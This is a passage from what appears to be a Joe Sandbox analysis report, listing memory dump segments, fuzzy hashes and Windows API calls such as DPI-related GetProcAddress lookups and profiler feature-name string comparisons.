                                    • Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 732f8aafec1c0d410ff216b27f2e5c03b4339b09f163d0f101acbef2ddceab04
                                    • Instruction ID: 7570ab65d7d2ec532a15f2d58645eb7d4814c0c14b3e66b246251c2e35266c29
                                    • Opcode Fuzzy Hash: 732f8aafec1c0d410ff216b27f2e5c03b4339b09f163d0f101acbef2ddceab04
                                    • Instruction Fuzzy Hash: 4F22F371E04629CFCB14CF98C890AADF7B2BF89308F548299D54AA7705D731AD86CF84
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true
                                    • Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c1f6e59a31cf7840b41f8d4345d1a083ab096da8f7c16775c0165708ec7d980b
                                    • Instruction ID: 9d3766d894ed6901f423c4ab5b40b5f3a877eb3fb0a6c11cbce35193a2e06e0b
                                    • Opcode Fuzzy Hash: c1f6e59a31cf7840b41f8d4345d1a083ab096da8f7c16775c0165708ec7d980b
                                    • Instruction Fuzzy Hash: FBF13B7160E7454FD700CF28C8903AABBF2AFCD318F158A2EE4D487782E7749845879A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c94b7e09901b45e30f29415f44faae6ce6938184204d188698ea3a1b7897a233
                                    • Instruction ID: 5261018b3e61b8f918e9f9aff7f933c871a26a992bb8560b008f49d8a861ffe4
                                    • Opcode Fuzzy Hash: c94b7e09901b45e30f29415f44faae6ce6938184204d188698ea3a1b7897a233
                                    • Instruction Fuzzy Hash: B6A136F36086019FE710AF2CEC8576AB7E5EF64310F15893DEAC4C3740E63A98598B56
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6dab621f338d2e76fa315c7fe435c28fbd8914ec399ed99552bafd97d08cebf9
                                    • Instruction ID: 48b2af9ca405636d34836b7445130fe6cb91a04f767b5012054864cf1bd7e00a
                                    • Opcode Fuzzy Hash: 6dab621f338d2e76fa315c7fe435c28fbd8914ec399ed99552bafd97d08cebf9
                                    • Instruction Fuzzy Hash: D07126B3E181245BE7042A3DDD4877ABBD5EBD4720F2B863DDAC8A7744E9394C0186D2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b40af86d41867f9de167c2ceb233a281df7aec35e3552c7b810ce9c2d27e29f1
                                    • Instruction ID: 88ff62a23ee55d34e1d1c93db901f157cb0127f5a12edae469caa7378c2e9c76
                                    • Opcode Fuzzy Hash: b40af86d41867f9de167c2ceb233a281df7aec35e3552c7b810ce9c2d27e29f1
                                    • Instruction Fuzzy Hash: BD6124F3E081105FE7086A28DC4577AB7E6DFD4320F1A4A3DDAC9D7380E9799C018682
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 88d597c185681307e4267aca10939450ef86bcd5cb52894743c7ea565b76481d
                                    • Instruction ID: 43507b013c506673f2909559b2d8718e0688fd5e92ba8688bd236ff2a594e65c
                                    • Opcode Fuzzy Hash: 88d597c185681307e4267aca10939450ef86bcd5cb52894743c7ea565b76481d
                                    • Instruction Fuzzy Hash: A66127F39083149FD304AF29ED4973AFBE6EB94760F068A3DDAC893744DA7558008696
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d09d4159b6bdd3952d6f6bad293ec7237abcc48b91aaf834597c0d9918ae7014
                                    • Instruction ID: 48016892c5675cc3d3199f2ee7dd80e32cc5e8fd767311b7a7385c6301d72dac
                                    • Opcode Fuzzy Hash: d09d4159b6bdd3952d6f6bad293ec7237abcc48b91aaf834597c0d9918ae7014
                                    • Instruction Fuzzy Hash: 845149B3E08214ABE3146D29EC9577AF7D5DB94720F2B453DEB88A3380E97A5D0142C6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                    • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                    • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                    • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                    APIs
                                    • LoadLibraryW.KERNEL32(user32,?,6C6AE1A5), ref: 6C6D5606
                                    • LoadLibraryW.KERNEL32(gdi32,?,6C6AE1A5), ref: 6C6D560F
                                    • GetProcAddress.KERNEL32(00000000,GetThreadDpiAwarenessContext), ref: 6C6D5633
                                    • GetProcAddress.KERNEL32(00000000,AreDpiAwarenessContextsEqual), ref: 6C6D563D
                                    • GetProcAddress.KERNEL32(00000000,EnableNonClientDpiScaling), ref: 6C6D566C
                                    • GetProcAddress.KERNEL32(00000000,GetSystemMetricsForDpi), ref: 6C6D567D
                                    • GetProcAddress.KERNEL32(00000000,GetDpiForWindow), ref: 6C6D5696
                                    • GetProcAddress.KERNEL32(00000000,RegisterClassW), ref: 6C6D56B2
                                    • GetProcAddress.KERNEL32(00000000,CreateWindowExW), ref: 6C6D56CB
                                    • GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 6C6D56E4
                                    • GetProcAddress.KERNEL32(00000000,SetWindowPos), ref: 6C6D56FD
                                    • GetProcAddress.KERNEL32(00000000,GetWindowDC), ref: 6C6D5716
                                    • GetProcAddress.KERNEL32(00000000,FillRect), ref: 6C6D572F
                                    • GetProcAddress.KERNEL32(00000000,ReleaseDC), ref: 6C6D5748
                                    • GetProcAddress.KERNEL32(00000000,LoadIconW), ref: 6C6D5761
                                    • GetProcAddress.KERNEL32(00000000,LoadCursorW), ref: 6C6D577A
                                    • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6C6D5793
                                    • GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 6C6D57A8
                                    • GetProcAddress.KERNEL32(00000000,SetWindowLongPtrW), ref: 6C6D57BD
                                    • GetProcAddress.KERNEL32(?,StretchDIBits), ref: 6C6D57D5
                                    • GetProcAddress.KERNEL32(?,CreateSolidBrush), ref: 6C6D57EA
                                    • GetProcAddress.KERNEL32(?,DeleteObject), ref: 6C6D57FF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true
                                    • Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID: AreDpiAwarenessContextsEqual$CreateSolidBrush$CreateWindowExW$DeleteObject$EnableNonClientDpiScaling$FillRect$GetDpiForWindow$GetMonitorInfoW$GetSystemMetricsForDpi$GetThreadDpiAwarenessContext$GetWindowDC$LoadCursorW$LoadIconW$MonitorFromWindow$RegisterClassW$ReleaseDC$SetWindowLongPtrW$SetWindowPos$ShowWindow$StretchDIBits$gdi32$user32
                                    • API String ID: 2238633743-1964193996
                                    • Opcode ID: d2966011756a88abf36ab1d4130aa3d4528494eebaa869fa8de4aa165f5c668b
                                    • Instruction ID: ecd2db558557c5717d38de9d7c68849a3b39153adceaae49f70f04f4c3a3b96b
                                    • Opcode Fuzzy Hash: d2966011756a88abf36ab1d4130aa3d4528494eebaa869fa8de4aa165f5c668b
                                    • Instruction Fuzzy Hash: 38514FF0A113129BEB019F36AD84D263AFBAB57385F114429A931E2A41EF70D805CF6D
                                    APIs
                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,default,?,6C68582D), ref: 6C6BCC27
                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,java,?,?,?,6C68582D), ref: 6C6BCC3D
                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,6C6EFE98,?,?,?,?,?,6C68582D), ref: 6C6BCC56
                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,leaf,?,?,?,?,?,?,?,6C68582D), ref: 6C6BCC6C
                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,mainthreadio,?,?,?,?,?,?,?,?,?,6C68582D), ref: 6C6BCC82
                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileio,?,?,?,?,?,?,?,?,?,?,?,6C68582D), ref: 6C6BCC98
                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileioall,?,?,?,?,?,?,?,?,?,?,?,?,?,6C68582D), ref: 6C6BCCAE
                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,noiostacks), ref: 6C6BCCC4
                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,screenshots), ref: 6C6BCCDA
                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,seqstyle), ref: 6C6BCCEC
                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,stackwalk), ref: 6C6BCCFE
                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,jsallocations), ref: 6C6BCD14
                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nostacksampling), ref: 6C6BCD82
                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,preferencereads), ref: 6C6BCD98
                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nativeallocations), ref: 6C6BCDAE
                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ipcmessages), ref: 6C6BCDC4
                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,audiocallbacktracing), ref: 6C6BCDDA
                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpu), ref: 6C6BCDF0
                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,notimerresolutionchange), ref: 6C6BCE06
                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpuallthreads), ref: 6C6BCE1C
                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,samplingallthreads), ref: 6C6BCE32
                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,markersallthreads), ref: 6C6BCE48
                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,unregisteredthreads), ref: 6C6BCE5E
                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,processcpu), ref: 6C6BCE74
                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,power), ref: 6C6BCE8A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true
                                    • Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                    Similarity
                                    • API ID: strcmp
                                    • String ID: Unrecognized feature "%s".$audiocallbacktracing$cpuallthreads$default$fileio$fileioall$ipcmessages$java$jsallocations$leaf$mainthreadio$markersallthreads$nativeallocations$noiostacks$nostacksampling$notimerresolutionchange$power$preferencereads$processcpu$samplingallthreads$screenshots$seqstyle$stackwalk$unregisteredthreads
                                    • API String ID: 1004003707-2809817890
                                    • Opcode ID: 7cc4ec1f92e8d038a2e75618217fd5f30b29c748bf677fb37495980d32dc8376
                                    • Instruction ID: eb33a2cc2fe9242b4db6972d19d4383660d1911652fb0c5d369798ba54e1f83d
                                    • Opcode Fuzzy Hash: 7cc4ec1f92e8d038a2e75618217fd5f30b29c748bf677fb37495980d32dc8376
                                    • Instruction Fuzzy Hash: 895168C5A4B32572FA0032196D247EA1889EF57349F104437EE27B5E80FB259726C7AF
                                    APIs
                                      • Part of subcall function 6C684730: GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C6844B2,6C6FE21C,6C6FF7F8), ref: 6C68473E
                                      • Part of subcall function 6C684730: GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C68474A
                                    • GetModuleHandleW.KERNEL32(WRusr.dll), ref: 6C6844BA
                                    • LoadLibraryW.KERNEL32(kernel32.dll), ref: 6C6844D2
